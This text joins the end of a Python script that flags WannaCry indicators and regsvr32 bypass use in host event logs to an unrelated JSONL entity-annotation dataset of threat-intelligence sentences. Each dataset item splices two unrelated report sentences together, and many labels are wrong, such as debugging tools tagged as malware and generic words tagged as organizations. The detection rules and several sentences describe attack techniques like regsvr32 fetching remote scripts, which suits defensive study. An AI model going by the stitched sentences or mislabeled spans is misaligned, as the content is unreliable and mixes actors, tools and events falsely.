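    """Return (host, rule_name, raw_line) for every rule hit.
    Lines that are not valid JSON are skipped rather than aborting the scan."""
    hits = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(ev, dict):
            continue
        for rule_name, rule in RULES.items():
            if rule(ev):
                hits.append((ev.get("host", "?"), rule_name, line))
    return hits

def summarize(lines: Iterable[str]) -> Dict[str, str]:
    """Per-host verdict: two or more distinct WannaCry indicators on one host
    is 'wannacry_confirmed', a single one is 'wannacry_suspect', and a
    regsvr32 hit with no WannaCry indicators is 'regsvr32_bypass'."""
    per_host: Dict[str, Set[str]] = {}
    for host, rule_name, _ in scan(lines):
        per_host.setdefault(host, set()).add(rule_name)
    verdicts = {}
    for host, rules in per_host.items():
        wc = rules & WANNACRY_RULES
        if len(wc) >= 2:
            verdicts[host] = "wannacry_confirmed"
        elif wc:
            verdicts[host] = "wannacry_suspect"
        elif "regsvr32_bypass" in rules:
            verdicts[host] = "regsvr32_bypass"
    return verdicts

if __name__ == "__main__":
    for host, rule_name, _ in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule_name}")
    print(summarize(SAMPLE_EVENTS))
```

The correlation step is the part worth keeping in a real pipeline: the .WCRY extension or a "-m security" argument alone is weak, but a service install plus the tasksche.exe drop on the same host is the behaviour the page describes in sequence. Host ws03, which registers a local DLL with regsvr32 and installs the legitimate Spooler service, produces no hits, which is the false-positive case the rules must not trip on.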
This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 51, "end": 55, "label": "Malware"}, {"start": 56, "end": 79, "label": "Malware"}, {"start": 126, "end": 133, "label": "Organization"}, {"start": 154, "end": 160, "label": "System"}, {"start": 211, "end": 224, "label": "Organization"}, {"start": 236, "end": 259, "label": "Organization"}]} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 110, "end": 123, "label": "Organization"}, {"start": 173, "end": 179, "label": "System"}, {"start": 194, "end": 208, "label": "Organization"}]} {"text": "Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 170, "end": 183, "label": "Organization"}, {"start": 204, "end": 212, "label": "Malware"}, {"start": 257, "end": 276, "label": "Organization"}]} {"text": "We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016 . 
The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": [{"start": 204, "end": 214, "label": "Organization"}, {"start": 228, "end": 234, "label": "Organization"}]} {"text": "In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 105, "end": 116, "label": "Organization"}, {"start": 200, "end": 206, "label": "Organization"}, {"start": 241, "end": 251, "label": "Organization"}]} {"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 32, "end": 44, "label": "Organization"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 368, "end": 378, "label": "Organization"}]} {"text": "Once in their possession , the actors use these compromised payment card credentials to generate further card information . 
APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": [{"start": 31, "end": 37, "label": "Organization"}, {"start": 124, "end": 141, "label": "Organization"}, {"start": 192, "end": 200, "label": "Organization"}]} {"text": "The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 60, "end": 68, "label": "System"}, {"start": 179, "end": 194, "label": "Organization"}, {"start": 260, "end": 266, "label": "Organization"}]} {"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": [{"start": 36, "end": 42, "label": "Organization"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 167, "end": 183, "label": "Organization"}, {"start": 199, "end": 219, "label": "Organization"}, {"start": 250, "end": 269, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 301, "end": 311, "label": "Organization"}]} {"text": "For this purpose , these actors often use tools such as Technitium MAC Address Changer . APT35 typically targets U.S. 
and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": [{"start": 25, "end": 31, "label": "Organization"}, {"start": 56, "end": 86, "label": "System"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 152, "end": 162, "label": "Organization"}, {"start": 167, "end": 187, "label": "Organization"}, {"start": 190, "end": 203, "label": "Organization"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 230, "end": 253, "label": "Organization"}, {"start": 256, "end": 259, "label": "Organization"}, {"start": 268, "end": 279, "label": "Organization"}, {"start": 282, "end": 299, "label": "Organization"}, {"start": 304, "end": 330, "label": "Organization"}]} {"text": "We have observed these actors using Tor or proxy-based tools similar to Tor (e.g , UltraSurf , as seen in Figure 2) . 
COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 36, "end": 39, "label": "System"}, {"start": 43, "end": 60, "label": "System"}, {"start": 118, "end": 130, "label": "Organization"}, {"start": 164, "end": 182, "label": "Organization"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 198, "end": 205, "label": "Organization"}, {"start": 208, "end": 211, "label": "Organization"}, {"start": 218, "end": 250, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}, {"start": 336, "end": 348, "label": "Organization"}]} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 199, "end": 211, "label": "Organization"}, {"start": 242, "end": 251, "label": "Organization"}]} {"text": "Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . 
The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 33, "end": 38, "label": "Organization"}, {"start": 259, "end": 272, "label": "Organization"}, {"start": 290, "end": 303, "label": "Organization"}, {"start": 309, "end": 320, "label": "Organization"}, {"start": 375, "end": 385, "label": "Organization"}]} {"text": "Payment card dumps are commonly shared amongst Brazilian threat actors via social media forums such as Facebook , Skype , and web-based WhatsApp messenger . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 64, "end": 70, "label": "Organization"}, {"start": 75, "end": 94, "label": "Organization"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 226, "end": 239, "label": "Organization"}, {"start": 245, "end": 256, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}]} {"text": "Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 16, "end": 21, "label": "Organization"}, {"start": 76, "end": 93, "label": "System"}, {"start": 96, "end": 116, "label": "System"}, {"start": 179, "end": 183, "label": "Malware"}, {"start": 257, "end": 272, "label": "Organization"}, {"start": 275, "end": 294, "label": "Organization"}, {"start": 297, "end": 316, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 404, "end": 412, "label": "Vulnerability"}, {"start": 445, "end": 449, "label": "Malware"}]} {"text": "These actors scan websites for vulnerabilities to exploit to illicitly access databases . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 90, "end": 95, "label": "Organization"}, {"start": 194, "end": 206, "label": "Malware"}, {"start": 228, "end": 237, "label": "Organization"}]} {"text": "They most commonly target Brazilian merchants , though others use the same tactics to exploit entities outside Brazil . 
Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 157, "end": 169, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 255, "end": 273, "label": "Organization"}, {"start": 276, "end": 298, "label": "Organization"}, {"start": 301, "end": 312, "label": "Organization"}, {"start": 315, "end": 334, "label": "Organization"}]} {"text": "The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 24, "end": 37, "label": "System"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 267, "end": 281, "label": "Malware"}]} {"text": "At least eight sellers update the website as frequently as daily , offering newly obtained databases from the U.S . 
In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 210, "end": 230, "label": "Organization"}]} {"text": "Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": [{"start": 42, "end": 58, "label": "System"}, {"start": 67, "end": 73, "label": "Organization"}, {"start": 313, "end": 321, "label": "Organization"}, {"start": 348, "end": 363, "label": "Organization"}, {"start": 397, "end": 417, "label": "Organization"}]} {"text": "One bulk card-checking tool this group uses is Testador Amazon.com v1.1 ( Figure 8 ) . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 4, "end": 22, "label": "System"}, {"start": 33, "end": 38, "label": "Organization"}, {"start": 87, "end": 96, "label": "Organization"}, {"start": 145, "end": 148, "label": "System"}, {"start": 281, "end": 284, "label": "Organization"}, {"start": 287, "end": 290, "label": "Organization"}, {"start": 297, "end": 320, "label": "Organization"}, {"start": 350, "end": 360, "label": "Organization"}]} {"text": "Despite its name , this tool does not use Amazon\u2019s website , but exploits an unauthenticated Cross-Site Request Forgery (CSRF) vulnerability of a merchant website allowing the abuse of PayPal Payflow link functionality (Figure 9) . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 185, "end": 199, "label": "System"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 290, "end": 293, "label": "System"}, {"start": 426, "end": 429, "label": "Organization"}, {"start": 432, "end": 435, "label": "Organization"}, {"start": 442, "end": 465, "label": "Organization"}, {"start": 495, "end": 505, "label": "Organization"}]} {"text": "Based on our observations of interactions in this channel , between May 2016 and June 2016 , malicious actors validated 2 , 987 cards from 62 countries , with the most coming from the U.S. (nearly half) , Brazil , and France . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": [{"start": 103, "end": 109, "label": "Organization"}, {"start": 242, "end": 261, "label": "Organization"}, {"start": 397, "end": 406, "label": "Organization"}]} {"text": "The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 160, "end": 166, "label": "System"}, {"start": 192, "end": 201, "label": "Indicator"}, {"start": 205, "end": 244, "label": "Organization"}]} {"text": "The group primarily uses the MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 29, "end": 45, "label": "System"}, {"start": 62, "end": 70, "label": "System"}, {"start": 123, "end": 131, "label": "Organization"}, {"start": 234, "end": 243, "label": "Organization"}]} {"text": "However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 294, "end": 313, "label": "Organization"}, {"start": 318, "end": 339, "label": "Organization"}]} {"text": "Some attacker tools were used to almost exclusively target organizations within APAC . 
It's possible TG-3390 used a waterhole to infect data center employees .", "spans": [{"start": 5, "end": 13, "label": "Organization"}, {"start": 101, "end": 108, "label": "Organization"}, {"start": 136, "end": 157, "label": "Organization"}]} {"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 134, "end": 145, "label": "Organization"}, {"start": 150, "end": 163, "label": "Organization"}, {"start": 201, "end": 220, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 365, "end": 375, "label": "Organization"}, {"start": 469, "end": 478, "label": "Organization"}]} {"text": "The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . 
The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 22, "end": 30, "label": "System"}, {"start": 62, "end": 70, "label": "System"}, {"start": 260, "end": 279, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 310, "end": 319, "label": "Organization"}, {"start": 326, "end": 349, "label": "Organization"}, {"start": 395, "end": 417, "label": "Organization"}]} {"text": "We recently observed Hancitor attacks against some of our FireEye Exploit Guard customers . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": [{"start": 21, "end": 29, "label": "Organization"}, {"start": 58, "end": 65, "label": "Organization"}, {"start": 185, "end": 203, "label": "Organization"}, {"start": 229, "end": 238, "label": "Organization"}]} {"text": "The group has performed these activities at multiple locations across Brazil , possibly using multiple mules . Turla is a notorious group that has been targeting government officials .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 162, "end": 182, "label": "Organization"}]} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . 
Turla is a notorious group that has been targeting diplomats .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 199, "end": 204, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}]} {"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": [{"start": 149, "end": 157, "label": "Malware"}, {"start": 181, "end": 191, "label": "Malware"}, {"start": 270, "end": 279, "label": "Organization"}]} {"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": [{"start": 48, "end": 52, "label": "Malware"}, {"start": 57, "end": 64, "label": "Malware"}, {"start": 175, "end": 184, "label": "Organization"}]} {"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . 
All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": [{"start": 76, "end": 84, "label": "Malware"}, {"start": 102, "end": 114, "label": "Malware"}, {"start": 183, "end": 192, "label": "Malware"}, {"start": 217, "end": 226, "label": "Organization"}]} {"text": "In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER\u201d identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 46, "end": 57, "label": "Malware"}, {"start": 78, "end": 84, "label": "Malware"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 359, "end": 365, "label": "System"}, {"start": 378, "end": 405, "label": "Organization"}]} {"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . 
We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 29, "label": "Malware"}, {"start": 155, "end": 166, "label": "Malware"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 229, "end": 237, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}, {"start": 307, "end": 326, "label": "Organization"}, {"start": 329, "end": 353, "label": "Organization"}, {"start": 360, "end": 382, "label": "Organization"}]} {"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 19, "label": "Malware"}, {"start": 77, "end": 88, "label": "Organization"}, {"start": 98, "end": 128, "label": "Malware"}, {"start": 143, "end": 149, "label": "Organization"}, {"start": 238, "end": 268, "label": "Organization"}, {"start": 271, "end": 289, "label": "Organization"}, {"start": 305, "end": 322, "label": "Organization"}, {"start": 334, "end": 352, "label": "Organization"}]} {"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . 
Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": [{"start": 58, "end": 64, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}, {"start": 132, "end": 152, "label": "Organization"}]} {"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 35, "end": 71, "label": "Malware"}, {"start": 76, "end": 105, "label": "Malware"}, {"start": 180, "end": 216, "label": "Organization"}]} {"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 239, "end": 264, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}]} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . 
Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 156, "end": 171, "label": "Malware"}, {"start": 236, "end": 240, "label": "Organization"}, {"start": 254, "end": 267, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}]} {"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 244, "end": 266, "label": "Organization"}, {"start": 288, "end": 315, "label": "Organization"}]} {"text": "The samples we identified target the ATM vendor Diebold . 
Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 37, "end": 55, "label": "Organization"}, {"start": 58, "end": 64, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 240, "end": 252, "label": "Organization"}, {"start": 329, "end": 338, "label": "Organization"}]} {"text": "This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": [{"start": 84, "end": 93, "label": "Malware"}, {"start": 111, "end": 120, "label": "Organization"}, {"start": 177, "end": 183, "label": "Organization"}, {"start": 197, "end": 216, "label": "Organization"}]} {"text": "Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits \u2013 4 digits) and the number of cycles (billCount \u2013 2 digits) to repeat the dispensing operation (see Figure 10) . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 26, "end": 35, "label": "Organization"}, {"start": 246, "end": 251, "label": "Organization"}]} {"text": "Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . 
Our research indicates that it has started targeting Japanese users .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 231, "end": 245, "label": "Organization"}]} {"text": "Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": [{"start": 6, "end": 15, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 139, "end": 150, "label": "Organization"}, {"start": 231, "end": 235, "label": "Malware"}, {"start": 273, "end": 284, "label": "Organization"}]} {"text": "Finally , Mandiant\u2019s Devon Kerr and John Miller of FireEye iSIGHT Intelligence will expose the tactics of FIN7 , a financially motivated hacker group that FireEye tracked throughout 2016 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": [{"start": 10, "end": 20, "label": "Organization"}, {"start": 51, "end": 58, "label": "Organization"}, {"start": 106, "end": 110, "label": "Organization"}, {"start": 115, "end": 126, "label": "Organization"}, {"start": 155, "end": 162, "label": "Organization"}, {"start": 189, "end": 202, "label": "Organization"}, {"start": 368, "end": 378, "label": "Organization"}, {"start": 412, "end": 430, "label": "Organization"}]} {"text": "In mid-November , Mandiant , a FireEye company , responded to the first Shamoon 2.0 incident against an organization located in the Gulf states . 
Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": [{"start": 18, "end": 26, "label": "Organization"}, {"start": 31, "end": 38, "label": "Organization"}, {"start": 158, "end": 165, "label": "Vulnerability"}, {"start": 239, "end": 244, "label": "System"}, {"start": 289, "end": 294, "label": "System"}]} {"text": "These attackers can potentially grab sensitive online banking information and other personal data , and even provided support for multifactor authentication and OTP . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": [{"start": 6, "end": 15, "label": "Organization"}, {"start": 54, "end": 61, "label": "Organization"}, {"start": 253, "end": 271, "label": "Organization"}, {"start": 276, "end": 287, "label": "Organization"}]} {"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 164, "end": 170, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}]} {"text": "Our visibility into APT28\u2019s operations , which date to at least 2007 , has allowed us to understand the group\u2019s malware , operational changes and motivations . 
The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 224, "end": 243, "label": "Organization"}, {"start": 246, "end": 263, "label": "Organization"}, {"start": 278, "end": 286, "label": "Organization"}, {"start": 319, "end": 340, "label": "Organization"}]} {"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat and strengthening our confidence in attributing APT28 to the Russian government . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": [{"start": 147, "end": 152, "label": "Organization"}, {"start": 160, "end": 178, "label": "Organization"}, {"start": 213, "end": 223, "label": "Malware"}, {"start": 250, "end": 262, "label": "Malware"}, {"start": 296, "end": 304, "label": "Organization"}]} {"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 134, "end": 146, "label": "Malware"}, {"start": 262, "end": 281, "label": "Organization"}, {"start": 290, "end": 311, "label": "Organization"}]} {"text": "The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . 
Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": [{"start": 4, "end": 16, "label": "Malware"}, {"start": 121, "end": 129, "label": "Malware"}, {"start": 147, "end": 165, "label": "Organization"}, {"start": 249, "end": 260, "label": "Organization"}, {"start": 263, "end": 269, "label": "Organization"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 285, "end": 292, "label": "Malware"}, {"start": 333, "end": 340, "label": "Malware"}, {"start": 341, "end": 348, "label": "Malware"}]} {"text": "We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": [{"start": 70, "end": 82, "label": "Malware"}, {"start": 145, "end": 153, "label": "Malware"}, {"start": 223, "end": 244, "label": "Organization"}, {"start": 247, "end": 255, "label": "Organization"}, {"start": 258, "end": 275, "label": "Organization"}, {"start": 278, "end": 296, "label": "Organization"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}, {"start": 327, "end": 350, "label": "Organization"}]} {"text": "There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet . 
